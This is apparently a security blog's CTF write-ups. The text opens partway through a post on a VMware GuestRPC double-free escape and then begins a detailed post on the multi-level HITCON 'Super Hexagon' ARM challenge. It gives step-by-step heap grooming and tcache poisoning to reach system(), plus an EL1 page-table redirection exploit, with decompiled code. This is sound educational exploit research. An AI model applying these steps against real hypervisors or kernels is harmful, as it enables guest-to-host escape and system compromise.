<p>The change itself is to a function responsible for handling VMware GuestRPC, an interface that allows the guest system to interact with the host via string-based requests, like a command interface. <a href="http://sysprogs.com/legacy/articles/kdvmware/guestrpc.shtml">Much has been written about GuestRPC before</a>, but briefly, it provides an ASCII interface to hypervisor internals. Most commands are short strings in the form of setters and getters, like <code class="highlighter-rouge">tools.capability.dnd_version 3</code> or <code class="highlighter-rouge">unity.operation.request</code>. Internally, the commands are sent over “channels”, of which there can be 8 at a time per guest. The flow of operations in a single request includes:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0. Open channel
1. Send command length
2. Send command data
3. Receive reply size
4. Receive reply data
5. "Finalize" transfer
6. Close channel
</code></pre></div></div>
<p>As a final note, guestrpc requests can be sent inside the guest userspace, so bugs in this interface are particularly interesting from an attacker perspective.</p>
<h2 id="the-bug">The bug</h2>
<p>Examining the changes, we find that they’re all in request type 5, corresponding to <code class="highlighter-rouge">GUESTRPC_FINALIZE</code>. The user controls the argument which is <code class="highlighter-rouge">& 0x21</code> and passed to <code class="highlighter-rouge">guestrpc_close_backdoor</code>.</p>
<pre><code class="language-clike">void __fastcall guestrpc_close_backdoor(__int64 a1, unsigned __int16 a2, char a3)
{
__int64 v3; // rbx
void *v4; // rdi
v3 = a1;
v4 = *(void **)(a1 + 8);
if ( a3 & 0x20 )
{
free(v4);
}
else if ( !(a3 & 0x10) )
{
sub_176D90(v3, 0);
if ( *(_BYTE *)(v3 + 0x20) )
{
vmx_log("GuestRpc: Closing RPCI backdoor channel %u after send completion\n", a2);
guestrpc_close_channel(a2);
*(_BYTE *)(v3 + 32) = 0;
}
}
}
</code></pre>
<p>Control of <code class="highlighter-rouge">a3</code> allows us to go down the first branch in a previously inaccessible manner, letting us free the buffer at <code class="highlighter-rouge">a1+0x8</code>, which corresponds to the buffer used internally to store the reply data passed back to the user. However, this same buffer will also be freed with command type 6, <code class="highlighter-rouge">GUESTRPC_CLOSE</code>, resulting in a controlled double free which we can turn into use-after-free. (The other patch nop’d out code responsible for NULLing out the reply buffer, which would have prevented this codepath from being exploited.)</p>
<p>Given that the bug is very similar to a traditional CTF heap pwnable, we can already envision a rough path forward, for which we’ll fill in details shortly:</p>
<ul>
<li>Obtain a leak, ideally of the <code class="highlighter-rouge">vmware-vmx</code> binary text section</li>
<li>Use tcache to allocate a chunk on top of a function pointer</li>
<li>Obtain <code class="highlighter-rouge">rip</code> and <code class="highlighter-rouge">rdi</code> control and invoke <code class="highlighter-rouge">system("/usr/bin/xcalc &")</code></li>
</ul>
<h2 id="heap-internals-and-obtaining-a-leak">Heap internals and obtaining a leak</h2>
<p>Firstly, it should be stated that the vmx heap appears to have little churn in a mostly idle VM, at least in the heap section used for guestrpc requests. This means that the exploit can relatively reliable even if the VM has been running for a bit or if the user was previously using the system.</p>
<p>In order to obtain a heap leak, we’ll perform the following series of operations</p>
<ol>
<li>Allocate three channels [A], [B], and [C]</li>
<li>Send the <code class="highlighter-rouge">info-set</code> commmand to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap.</li>
<li>Open channel [B] and issue a <code class="highlighter-rouge">info-get</code> to retrieve the data we just set</li>
<li>Issue the reply length and reply read commands on channel [B]</li>
<li>Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer</li>
<li>Invoke <code class="highlighter-rouge">info-get</code> on channel [C] and receive the reply length, which allocates a buffer at the same address we just</li>
<li>Close channel [B], freeing the buffer again</li>
<li>Read out the reply on channel [C] to leak our data</li>
</ol>
<p>Each <code class="highlighter-rouge">vmware-vmx</code> process has a number of associated threads, including one thread per guest vCPU. This means that the underlying glibc heap has both the tcache mechanism active, as well as several different heap arenas. Although we can avoid mixing up our tcache chunks by pinning our cpu in the guest to a single core, we still cannot directly leak a <code class="highlighter-rouge">libc</code> pointer because only the <code class="highlighter-rouge">main_arena</code> in the glibc heap resides there. Instead, we can only leak a pointer to our individual thread arena, which is less useful in our case.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[#0] Id 1, Name: "vmware-vmx", stopped, reason: STOPPED
[#1] Id 2, Name: "vmx-vthread-300", stopped, reason: STOPPED
[#2] Id 3, Name: "vmx-vthread-301", stopped, reason: STOPPED
[#3] Id 4, Name: "vmx-mks", stopped, reason: STOPPED
[#4] Id 5, Name: "vmx-svga", stopped, reason: STOPPED
[#5] Id 6, Name: "threaded-ml", stopped, reason: STOPPED
[#6] Id 7, Name: "vmx-vcpu-0", stopped, reason: STOPPED <-- our vCPU thread
[#7] Id 8, Name: "vmx-vcpu-1", stopped, reason: STOPPED
[#8] Id 9, Name: "vmx-vcpu-2", stopped, reason: STOPPED
[#9] Id 10, Name: "vmx-vcpu-3", stopped, reason: STOPPED
[#10] Id 11, Name: "vmx-vthread-353", stopped, reason: STOPPED
. . . .
</code></pre></div></div>
<p>To get around this, we’ll modify the above flow to spray some other object with a vtable pointer. I came across <a href="http://acez.re/the-weak-bug-exploiting-a-heap-overflow-in-vmware/">this writeup</a> by Amat Cama which detailed his exploitation in 2017 using drag-n-drop and copy-paste structures, which are allocated when you send a guestrpc command in the host vCPU heap.</p>
<p>Therefore, I updated the above flow as follows to leak out a vtable/<code class="highlighter-rouge">vmware-vmx</code>-bss pointer</p>
<ol>
<li>Allocate four channels [A], [B], [C], and [D]</li>
<li>Send the <code class="highlighter-rouge">info-set</code> commmand to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap.</li>
<li>Open channel [B] and issue a <code class="highlighter-rouge">info-get</code> to retrieve the data we just set</li>
<li>Issue the reply length and reply read commands on channel [B]</li>
<li>Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer</li>
<li>Invoke <code class="highlighter-rouge">info-get</code> on channel [C] and receive the reply length, which allocates a buffer at the same address we just</li>
<li>Close channel [B], freeing the buffer again</li>
<li>Send <code class="highlighter-rouge">vmx.capability.dnd_version</code> on channel [D], which allocates an object with a vtable on top of the chunk referenced by [C]</li>
<li>Read out the reply on channel [C] to leak the vtable pointer</li>
</ol>
<p>One thing I did notice is that the copy-paste and drag-n-drop structures appear to only allocate their vtable-containing objects once per guest execution lifetime. This could complicate leaking pointers inside VMs where guest tools are installed and actively being used. In a more reliable exploit, we would hope to create a more repeatable arbitrary read and write primtive, maybe with these heap constructions alone. From there, we could trace backwards to leak our vmx binary.</p>
<h2 id="overwriting-a-channel-structure">Overwriting a channel structure</h2>
<p>Once we have obtained a vtable leak, we can begin looking for interesting structures in the BSS. <code class="highlighter-rouge">vmware-vmx</code> has <code class="highlighter-rouge">system</code> in its GOT, so we can also jump to the stub as a proxy for <code class="highlighter-rouge">system</code>’s address.</p>
<p>I chose to target the underlying <code class="highlighter-rouge">channel_t</code> structures which are created when you open a guestrpc channel. <code class="highlighter-rouge">vmware-vmx</code> has an array of 8 of these structures (size 0x60) inside its BSS, with each structure containing several buffer pointers, lengths, and function pointers.</p>
<p>Most notably, this structure matches up favorably to our code above in <code class="highlighter-rouge">GUESTRPC_FINALIZE</code></p>
<pre><code class="language-clike">// v6 is read from the channel structure...
v6 = (void (__fastcall *)(__int64, _QWORD, _QWORD))v26->fp_close_backdoor;
// . . . .
// ... and so is the first argument
v6(v26->field_48, v5, v7 & 0x21); // guestrpc_close_backdoor
</code></pre>
<p>To target this, we’ll abuse the tcache mechanism in glibc 2.27, the glibc version in use on the host system. In that version of glibc, tcache was completely unprotected, and by overwriting the first quadword of a freed chunk on a tcache freelist, we can allocate a chunk of that size anywhere in memory by simplying subsequently allocating that size twice. Therefore, we make our exploit land on top of a channel structure, set bogus fields to control the function pointer and argument, and then invoke <code class="highlighter-rouge">GUESTRPC_FINALIZE</code> to call <code class="highlighter-rouge">system("/usr/bin/xcalc")</code>. The full steps are as follows:</p>
<ol>
<li>Allocate five channels [A], [B], [C], [D], and [E]</li>
<li>Send the <code class="highlighter-rouge">info-set</code> commmand to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap.
a. This time, populate the <code class="highlighter-rouge">info-set</code> value such that its first 8 bytes are a pointer to the <code class="highlighter-rouge">channel_t</code> array in the BSS.</li>
<li>Open channel [B] and issue a <code class="highlighter-rouge">info-get</code> to retrieve the data we just set</li>
<li>Issue the reply length and reply read commands on channel [B]</li>
<li>Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer</li>
<li>Invoke <code class="highlighter-rouge">info-get</code> on channel [C] and receive the reply length, which allocates a buffer at the same address we just</li>
<li>Close channel [B], freeing the buffer again</li>
<li>Invoke <code class="highlighter-rouge">info-get</code> on channel [D] to flush one chunk from the tcache list; the next chunk will land on our channel</li>
<li>Send a “command” to [E] consisting of fake chunk data padded to our buggy chunksize. This will land on our <code class="highlighter-rouge">channel_t</code> BSS data and give us control over a channel</li>
<li>Invoke <code class="highlighter-rouge">GUESTRPC_FINALIZE</code> on our corrupted channel to pop calc</li>
</ol>
<div style="width: 100%; height: 0px; position: relative; padding-bottom: 51.250%;"><iframe src="https://streamable.com/s/ajb09/koafmy" frameborder="0" width="100%" height="100%" allowfullscreen="" style="width: 100%; height: 100%; position: absolute;"></iframe></div>
<p><br /></p>
<h2 id="conclusion">Conclusion</h2>
<p>This was definitely a light challenge with which to dip my feet in VMware exploitation. The exploitation itself was pretty vanilla heap, but the overall challenge did involve some RE on the <code class="highlighter-rouge">vmware-vmx</code> binary, and required becoming familiar with some of the attack surface exposed to the guest. For a CTF challenge, it hit roughly the appropriate intersection of “real world” and “solvable in 48 hours” that you would expect from a high quality event. You can find my final solution script in my <a href="https://github.com/nafod/advent-vmpwn">advent-vmpwn</a> github repo.</p>
<p>From here on out, my advent calendar involves 2 CVEs, both of which are in virtual hardware devices implemented by the <code class="highlighter-rouge">vmware-vmx</code> binary. Furthermore, neither has a public POC nor details on exploitation, so they should be more interesting to dive in to. So, stay tuned for my next post if you’re interested on digging into the underpinnings of USB ;)</p>
<h2 id="useful-links">Useful Links</h2>
<p><a href="http://acez.re/the-weak-bug-exploiting-a-heap-overflow-in-vmware/">The Weak Bug - Exploiting a Heap Overflow in VMware</a>
<a href="https://zhuanlan.zhihu.com/p/52140921">Real World CTF 2018 Finals Station-Escape Writeup</a> (challenge files are linked here!)</p>Since December rolled around, I have been working on pwnables related to VMware breakouts as part of my advent calendar for 2019. Advent calendars are a fun way to get motivated to get familiar with a target you’re always putting off, and I had a lot of success learning about V8 with my calendar from last year.There and Back Again: HITCON 2018’s Super Hexagon2019-08-02T15:37:06+00:002019-08-02T15:37:06+00:00https://nafod.net/blog/2019/08/02/hitcon-2018-super-hexagon<p>One of the most interesting and unique CTF challenges I’ve seen over the past year was the “Super Hexagon” challenge from HITCON 2018. The challenge is unlike any other in several ways. A single bios.bin is distributed to the player that contains six (!) different levels to pwn, spread across all current exception levels, and involving both armv7 and aarch64 execution.</p>
<p>Each level requires the full gamut of exploitation skills; reversing, attack surface analysis, bug hunting, exploitation, and stable execution. Furthermore, challenges involving ARM Secure World attacks have been scarce in CTF, despite the prevalence of TrustZone in devices all around us. During the CTF itself, only one team (Dragon Sector) solved all 6 levels, and only 2 teams reached level 4. Since I missed working on the challenge during the CTF, I decided to revisit it here ahead of the upcoming HITCON 2019 CTF to solve and discuss all 6 levels of the challenge. Let’s begin!</p>
<h3 id="a-brief-overview">A Brief Overview</h3>
<p><img src="/blog/assets/images/super-hexagon-levels.png" alt="challenge layout" /></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Super Hexagon
Escape each level for your six flags.
EL0 - Hard
EL1 - Harder
EL2 - Hardest
S-EL0 - Hardester
S-EL1 - Hardestest
S-EL3 - Hardestestest
</code></pre></div></div>
<p>The challenge authors distributed a single targz consisting of a docker setup, with a qemu-system-aarch64 binary and a bios.blob. We also receive two qemu patches. One of them adds support for a new ARM machine “hitcon”, and the other patches QEMU to allow debugging ARM and thumb modes inside qemu-system-aarch64 - more on that later. The first <code class="highlighter-rouge">qemu.patch</code> also contains some useful physical memory layout information, which will inform our efforts later.</p>
<pre><code class="language-cpp=">static const MemMapEntry memmap[] = {
/* Space up to 0x8000000 is reserved for a boot ROM */
[VIRT_FLASH] = { 0, 0x08000000 },
[VIRT_CPUPERIPHS] = { 0x08000000, 0x00020000 },
[VIRT_UART] = { 0x09000000, 0x00001000 },
[VIRT_SECURE_MEM] = { 0x0e000000, 0x01000000 },
[VIRT_MEM] = { 0x40000000, RAMLIMIT_BYTES },
};
</code></pre>
<p>The challenge is distributed with a dockerfile, but to avoid dealing with docker we can create the required path on our own system (<code class="highlighter-rouge">/home/super_hexagon/</code>) and copy the binaies and flag folders there. When we run it, we’re presented with the following boot log:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>NOTICE: UART console initialized
INFO: MMU: Mapping 0 - 0x2844 (783)
INFO: MMU: Mapping 0xe000000 - 0xe204000 (40000000000703)
INFO: MMU: Mapping 0x9000000 - 0x9001000 (40000000000703)
NOTICE: MMU enabled
NOTICE: BL1: HIT-BOOT v1.0
INFO: BL1: RAM 0xe000000 - 0xe204000
INFO: SCTLR_EL3: 30c5083b
INFO: SCR_EL3: 00000738
INFO: Entry point address = 0x40100000
INFO: SPSR = 0x3c9
VERBOSE: Argument #0 = 0x0
VERBOSE: Argument #1 = 0x0
VERBOSE: Argument #2 = 0x0
VERBOSE: Argument #3 = 0x0
NOTICE: UART console initialized
[VMM] RO_IPA: 00000000-0000c000
[VMM] RW_IPA: 0000c000-0003c000
[KERNEL] mmu enabled
INFO: TEE PC: e400000
INFO: TEE SPSR: 1d3
NOTICE: TEE OS initialized
[KERNEL] Starting user program ...
=== Trusted Keystore ===
Command:
0 - Load key
1 - Save key
cmd>
</code></pre></div></div>
<p>From the log alone we can already derive some useful information, including virtual address ranges and translation table entries. A “TEE OS” is mentioned, which is likely resident in S-EL1. We also see the entrypoint for our input, which is a menu containing some key operations. Playing with these doesn’t yield much interesting yet, however.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>=== Trusted Keystore ===
Command:
0 - Load key
1 - Save key
cmd> 1
index: 0
key: hello
[0] <= hello
cmd> 0
index: 0
[0] => 0e00
cmd>
index:
[0] => 0e00
cmd>
</code></pre></div></div>
<h3 id="initial-reversing">Initial Reversing</h3>
<p>Opening the binary in IDA and disassembling the entrypoint yields instructions that look sufficiently like the start of EL3.</p>
<pre><code class="language-asm=">0x0004 MOVK X0, #0x30C5,LSL#16 ; Set bits M, C, I
0x0008 MSR 6, c1, c0, #0, X0 ; [>] SCTLR_EL3 (System Control Register (EL3))
0x000C ISB
0x0010 ADR X0, el3_interrupt_table
0x0014 MSR #6, c12, c0, #0, X0 ; [>] VBAR_EL3 (Vector Base Address Register (EL3))
0x0018 ISB
0x001C MOV X1, #0b1000000001010
0x0020 MRS X0, #6, c1, c0, #0 ; [<] SCTLR_EL3 (System Control Register (EL3))
0x0024 ORR X0, X0, X1
0x0028 MSR #6, c1, c0, #0, X0 ; [>] SCTLR_EL3 (System Control Register (EL3))
0x002C ISB
0x0030 MOV X0, #0x238 ; Set bits EA, SIF
0x0034 MSR #6, c1, c1, #0, X0 ; [>] SCR_EL3 (Secure Configuration Register)
0x0038 MOV X0, #0x8000
0x003C MOVK X0, #1,LSL#16
0x0040 MSR #6, c1, c3, #1, X0 ; [>] MDCR_EL3 (Monitor Debug Configuration Register (EL3))
0x0044 MSR #7, #4 ; Clr PSTATE.DAIF [-A--]
0x0048 MOV X0, #0
0x004C MSR #6, c1, c1, #2, X0 ; [>] CPTR_EL3 (Architectural Feature Trap Register (EL3))
0x0050 LDR X0, =0xE002000
0x0054 LDR X1, =0x202000
</code></pre>
<p>The binary begins by setting up several MSRs and copying code from the ROM into specific physical addresses. These will be a useful jumping off point for identifying the start of other code blobs, since the EL2/EL1/S-EL1 code is all mapped here by EL3. Tracing down further we find MMU initialization, and then a drop to a lower EL for further setup.</p>
<p>But where is EL1? searching for some of the menu strings (“0 - Load key”) and scrolling around yields something interesting - bios.bin contains an ELF header at offset 0xbc010.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>000bbfe0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000bbff0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000bc000: 3200 0000 0000 0000 0000 0000 0000 0000 2...............
000bc010: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............ <--
000bc020: 0200 b700 0100 0000 e800 4000 0000 0000 ..........@.....
000bc030: 4000 0000 0000 0000 c8a7 0000 0000 0000 @...............
</code></pre></div></div>
<h3 id="el0-getting-started">EL0: Getting started</h3>
<p>Extracting the header yields a valid, statically linked ELF file with debug symbols. <code class="highlighter-rouge">checksec</code> tells us there is no ASLR, but NX is enabled (we can confirm this is enforced in our debugger). The ELF looks very similar to a standard Linux userland binary, and comes baked with simple libc functions (printf/puts/read/scanf). Based on the strings and functionality, this is definitely our EL0 code. The first task the binary does is to load an opaque trustlet blob via syscall, followed by mapping some “world shared memory” buffers.</p>
<pre><code class="language-cpp=">void load_trustlet(unsigned __int8 *base, int size)
{
size_t v4;
void *v5;
unsigned int v6;
TCI *v7;
unsigned int v8;
v4 = (size + 4095) & 0xFFFFF000;
v5 = mmap(0LL, v4, 3, 0, 0, -1LL);
v6 = tc_register_wsm(v5, (void *)v4);
if ( v6 == -1 )
{
printf("tc_register_wsm: failed to register world shared memory\n");
exit(0xFFFFFFFFLL);
}
memcpy(v5, base, size);
if ( (unsigned int)tc_init_trustlet(v6, size) )
{
printf("tc_init_trustlet: failed to load trustlet\n");
exit(0xFFFFFFFFLL);
}
v7 = (TCI *)mmap(0LL, 0x1000uLL, 3, 0, 0, -1LL);
v8 = tc_register_wsm(v7, (void *)0x1000);
if ( v8 == -1 )
{
printf("tc_register_wsm: failed to register world shared memory\n");
exit(0xFFFFFFFFLL);
}
tci_buf = v7;
tci_handle = v8;
}
</code></pre>
<p>We can surmise that the WSM buffers are likely shared mappings between normal and secure world. After setting up the trustlet code, the binary inializes a function pointer table with 2 functions, then goes into a loop calling the <code class="highlighter-rouge">run()</code> function for 10 iterations.</p>
<pre><code class="language-cpp=">void run()
{
int64_t buf_len;
int idx;
int cmd;
printf("cmd> ");
scanf("%d", &cmd);
printf("index: ");
scanf("%d", &idx);
if ( cmd == 1 )
{
printf("key: ");
scanf("%s", buf); // <---- [A]
buf_len = (unsigned int)strlen(buf);
}
else
{
buf_len = 0LL;
}
cmdtb[cmd])(buf, (unsigned int)idx, buf_len); // <---- [B]
}
</code></pre>
<p>This function is trivially vulnerable. At <code class="highlighter-rouge">[A]</code>, we use the uncontrolled <code class="highlighter-rouge">%s</code> format specifier with <code class="highlighter-rouge">scanf()</code> to read into a buf created with <code class="highlighter-rouge">mmap</code> earlier. At <code class="highlighter-rouge">[B]</code>, we invoke a function pointer in the <code class="highlighter-rouge">cmdtb</code>, but the (signed) index is not bounded. For that function call we control the data pointed to by the first argument, <code class="highlighter-rouge">buf</code>, and the lower 32 bits of the second argument, <code class="highlighter-rouge">idx</code>. Since <code class="highlighter-rouge">cmdtb</code> is also in the BSS let’s further examine the surrounding memory layout there.</p>
<pre><code class="language-=">0x0412650: input ; unsigned __int8 input[256]
0x0412750: cmdtb ; cmd_func cmdtb[2]
0x0412760: tci_handle ; unsigned int tci_handle
0x0412768: buf ; unsigned __int8 *buf
0x0412770: tci_buf ; TCI *tci_buf
</code></pre>
<p>The static buffer <code class="highlighter-rouge">input</code> is used directly inside the <code class="highlighter-rouge">scanf()</code> function, which invokes our good old friend <code class="highlighter-rouge">gets()</code>.</p>
<pre><code class="language-cpp=">int scanf(const unsigned __int8 *fmt, ...)
{
__va_list_tag va[1];
__va_list_tag ap[1];
va_start(va, fmt);
va_start(ap, fmt);
gets(input); // <---- full control of input
return vsscanf(input, fmt, (__va_list *)va);
}
</code></pre>
<p>We can write function pointers directly to the <code class="highlighter-rouge">input</code> buffer and then invoke them with a negative <code class="highlighter-rouge">cmdtb</code> offset, for control of PC. But where to go? Scanning the binary reveals an <code class="highlighter-rouge">mprotect</code> syscall, which is perfect. We can populate our shellcode into the <code class="highlighter-rouge">buf</code> pointer with <code class="highlighter-rouge">scanf</code> in an initial pass, then invoke the function again to set <code class="highlighter-rouge">buf_len</code> to 7. Since it’s being read in with <code class="highlighter-rouge">scanf</code>, we’ll write a simple alphanumeric stager to read in our real unrestricted payload.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ERROR: [VMM] RWX pages are not allowed
</code></pre></div></div>
<p>Oops! Seems like the EL2 hypervisor prevents us from mapping RWX. Luckily, we can read in the shellcode first and then just <code class="highlighter-rouge">mprotect</code> it R-X, no problem.</p>
<h3 id="el1-escalating-privileges">EL1: Escalating Privileges</h3>
<p>Now that we can execute arbitrary code in EL0 context, we can begin auditing EL1. For this we return back to bios.bin. We’ll again examine the <code class="highlighter-rouge">memcpy</code> functions invoked by EL3 to find something that looks like EL1. The blob at 0xb0000, aarch64 code, contains strings prefixed with <code class="highlighter-rouge">[KERNEL]</code>, so it’s a safe bet. Our primary concern is the syscall interface, since it’s the only interface we know of exposed to EL0. We find the syscall function handler at 0xB8BA8.</p>
<p>4 main syscalls are exposed to us: <code class="highlighter-rouge">write</code>, <code class="highlighter-rouge">read</code> (only 1 char at a time), <code class="highlighter-rouge">mmap</code>, and <code class="highlighter-rouge">mprotect</code>. We also have a series of secure call passthrough syscalls, which we’ll revisit later. <code class="highlighter-rouge">mmap</code> and <code class="highlighter-rouge">mprotect</code> both perform extensive checking on their arguments.</p>
<pre><code class="language-cpp=">if ( syscall_nr == 0xDE ) // mmap, for example
{
if ( addr ) // addr must be NULL (no MAP_FIXED)
{
prot = -1i64;
}
else if ( size & 0xFFF ) // size must be page aligned
{
prot = -1i64;
}
else
{
v12 = el1_find_contiguous_pages(size);
if ( v12 == -1 )
{
prot = -1i64;
}
else
{
v21 = el1_allocate_el0_page(size);
for ( j = v12; arg1 + v12 > j; j += 4096i64 )
el1_change_el0_page_permissions(j, j + v21 - v12, prot);
prot = v12;
}
}
}
</code></pre>
<p><code class="highlighter-rouge">write</code> also looks relatively straightforward</p>
<pre><code class="language-cpp=">else if ( syscall_nr == 0x40 )
{
for ( i = 0i64; i < len; ++i )
el1_output_char(buffer[i]);
}
</code></pre>
<p>That leaves us with only <code class="highlighter-rouge">read</code>, which helps us out with a very useful bug.</p>
<pre><code class="language-cpp=">if ( syscall_nr == 0x3F ) // read
{
if ( arg2 )
{
ch = el1_read_char();
if ( ch & 0x80000000 )
{
arg2 = -1i64;
}
else
{
*(_BYTE *)outp = ch; // <---- [A]
arg2 = 1i64;
}
}
}
</code></pre>
<p>After reading in the character via <code class="highlighter-rouge">el1_read_char()</code>, it will write it back to the specified memory address. The kernel is not enforcing PAN hardware protections, so it can write directly to the specified userspace address. Astute readers will notice there’s no null check, or check to see if the address is mapped in userspace, meaning we can pass in any kernel address and write directly to it. This used to be a pretty common bug class but still pops up ever now and then, <a href="https://www.synacktiv.com/posts/exploit/exploiting-a-no-name-freebsd-kernel-vulnerability.html">most recently seen in FreeBSD for example.</a></p>
<p>The kernel has no ASLR to speak of, but the hypervisor is still enforcing NX. Writing to the stack could be a possibility; smashing our saved frame pointer could allow us to pivot a higher level call and achieve PC control, at which point we can ret2usr and run shellcode off an existing mapping.</p>
<p>I took a different approach however, since I didn’t think of that at the time. Instead, I decided to directly target EL1 translation table entries (TTEs) to replace a kernel page physaddr with that of my shellcode.</p>
<p><img src="/blog/assets/images/super-hexagon-tte.png" alt="tte diagram" /></p>
<p>Tracing through EL1 boot code, we find <code class="highlighter-rouge">el1_setup_user_mappings()</code>, which invokes <code class="highlighter-rouge">el1_change_el0_page_permissions()</code> to update TTE values whenever any page will be mapped. This occurs both when EL1 maps itself, as well as when EL1 loads the userspace ELF.</p>
<pre><code class="language-cpp=">void el1_change_page_permissions(uint64_t virtaddr, uint64_t physaddr, char prot)
{
uint64_t vaddr; // x22
int64_t v4; // x19
int64_t v5; // x20
int64_t v6; // x21
int64_t v7; // x0
vaddr = virtaddr;
if ( 0x400DC000 > physaddr || (v4 = physaddr, 0x400EB000 <= physaddr) )
{
el1_kprintf_0((__int64)"[KERNEL] Try to map illegal PA (user)\n");
el1_wfi_spinloop();
}
if ( prot & 2 )
{
v5 = 0x4C3i64;
v6 = 0x20000000000443i64;
}
else
{
v5 = 0x443i64;
v6 = 0x200000000004C3i64;
}
if ( !(prot & 4) )
{
v6 |= 0x40000000000000ui64;
v5 |= 0x40000000000000ui64;
}
v7 = el1_virt_to_phys(*(_QWORD *)((char *)&unk_C8BD7 + 0x15B9));
el1_update_page_table(0i64, v7, vaddr, v6 | v4);
el1_hypervisor_call(1i64, v4, v5, 0i64); // invoke vmm_mmap
__asm { SYS #0, c8, c7, #0 }
}
</code></pre>
<p>Notice that each translation table operation made also invokes a call to <code class="highlighter-rouge">vmm_mmap</code> in EL2 to validate the operation; this is the point at which our earlier attempt to map RWX triggered an abort(). The actual operation itself happens just before that hypercall, in <code class="highlighter-rouge">el1_update_page_table</code>.</p>
<pre><code class="language-cpp=">// translationtable is a qword array
translationtable[((virtaddr >> 12) & 0x1FF))] = physaddr_with_flags;
</code></pre>
<p>We can examine these TTEs in a debugger to get an idea of their values, but the above function also maps <code class="highlighter-rouge">prot</code> values cleanly to expected flags</p>
<pre><code class="language-css=">gef> x/i $pc
=> 0xffffffffc000875c: str x3, [x1, x2, lsl #3]
// the base of our translation table
gef> x/4xg $x1
0xffffffffc0023000: 0x002000000002c4c3 0x002000000002d4c3
0xffffffffc0023010: 0x002000000002e4c3 0x0000000000000000
// the virtaddr to be updated
gef> p $x19
$15 = 0x412000
// the entry for this address, mapped RW
gef> stepi
gef> x/xg $x1 + ($x2 << 3)
0xffffffffc0023090: 0x006000000002f443
</code></pre>
<p>Abusing the <code class="highlighter-rouge">read</code> bug, we can read updated values directly into the PTE entry. But writing still faults! As it turns out, without the <code class="highlighter-rouge">el1_hypervisor_call</code> at the end of <code class="highlighter-rouge">el1_change_page_permissions</code>, the MMU in EL2 won’t be updated to reflect the changes, and will fault on our write attempt. These memory flags in EL2 seem to be associated with the physical page address, so our writable mappings won’t work directly.</p>
<p>To avoid this, we can twiddle the bits on the TTE to point the existing page to our own, after we’ve already mapped it executable. Then, smashing a single byte in the stored return value on the stack should allow our syscall handler to return to our now-kernel-mapped shellcode page. The final flow of the exploit works as follows.</p>
<ol>
<li>Copy shellcode from the exploit script onto a RW mapping made with mmap</li>
<li>Update the mapping to be RX</li>
<li>Get its physical page number (deterministic across runs)</li>
<li>Write to EL1’s TTE for the virtal address associated with the base of the kernel. Make it point to our physical page</li>
<li>Smash a byte in the return address on the syscall handler stack. Again, this address will be deterministic. Execution returns to an offset in the first page of EL1, which now points to controlled data :)</li>
</ol>
<h3 id="el2-almost-bare-emulated-metal">EL2: (Almost) bare (emulated) metal</h3>
<p>Wow, kernel execution! Normally this would be great, but we’re only 2/6 of the way through. We’re now faced with targeting EL2, also known as the vmm or hypervisor. EL3 init tells us that EL2 starts at offset 0x10000, with a very small amount of code, mostly enabling MSR’s and setting up UART for terminal r/w. The vmm itself is mapped beginning at physical address 0x40100000. Of note as always is the EL2 MMU setup, which gives us another clue to the boot log puzzle.</p>
<pre><code class="language-cpp=">void __cdecl el2_setup_mappings()
{
unsigned __int64 i;
__int64 v1;
__int64 v2;
unsigned __int64 j;
unsigned __int64 k;
__int64 v5;
__int64 v6;
el2_memset(el2_pte, 0, 0x1000i64);
el2_memset(vmm_translationtables, 0, 0x8000i64);
for ( i = 0i64; i <= 0x1FFFFF; i += 0x200000i64 )
el2_pte[(i >> 21) & 0x1FF] = (uint64_t)&vmm_translationtables[512 * ((i >> 21) & 0x1FF)] | 3;
el2_printf("[VMM] RO_IPA: %08x-%08x\n", v5, v6);
el2_printf("[VMM] RW_IPA: %08x-%08x\n", v1, v2);
for ( j = 0i64; j <= 0xBFFF; j += 0x1000i64 )
el2_mmap(j, 0x443i64);
for ( k = 0xC000i64; k <= 0x3BFFF; k += 0x1000i64 )
el2_mmap(k, 0x400000000004C3i64);
_WriteStatusReg(ARM64_SYSREG(3, 4, 2, 1, 0), (unsigned __int64)el2_pte); // VTTBR_EL2
_WriteStatusReg(ARM64_SYSREG(3, 4, 2, 1, 2), 0x80000027ui64); // VTCR_EL2
}
</code></pre>
<p>At boot, the printfs emitted were as follows</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[VMM] RO_IPA: 00000000-0000c000
[VMM] RW_IPA: 0000c000-0003c000
</code></pre></div></div>
<p>Beginning at 0x40100000, it seems that EL2 reserves 0xC000 bytes for itself and then maps 0x30000 for EL1 and EL0. Those latter entries have the <code class="highlighter-rouge">PXN</code>bits set, so the vmm won’t execute off them directly.</p>
<p>The only exposed interface we’ve seen is the hypercall after the TTE update, so let’s take a look at the El2 hypercall interface</p>
<pre><code class="language-cpp=">_QWORD * el2_handle_hypercall(__int64 *args)
{
unsigned int v2;
signed __int64 arg0;
_QWORD *arg1;
__int64 arg3;
v2 = (unsigned int)_ReadStatusReg(ARM64_SYSREG(3, 4, 5, 2, 0)) >> 26;
arg0 = *args;
arg1 = (_QWORD *)args[1];
arg3 = args[3];
if ( v2 == 0x16 )
{
if ( arg0 == 1 )
arg1 = el2_mmap(arg1, args[2]);
else
arg0 = -1i64;
}
else
{
// ... ignore securecall passthrough for now ...
}
*args = arg0;
return arg1;
}
</code></pre>
<p>There’s only one hypercall, which is <code class="highlighter-rouge">el2_mmap</code>. Before even opening the function, we envision that any bug must somehow allow us the ability to map an EL2 physical address to a writable mapping in EL1. We’re aware that the two arguments passed, as seen in the EL1 call, are physical address and TTE bits.</p>
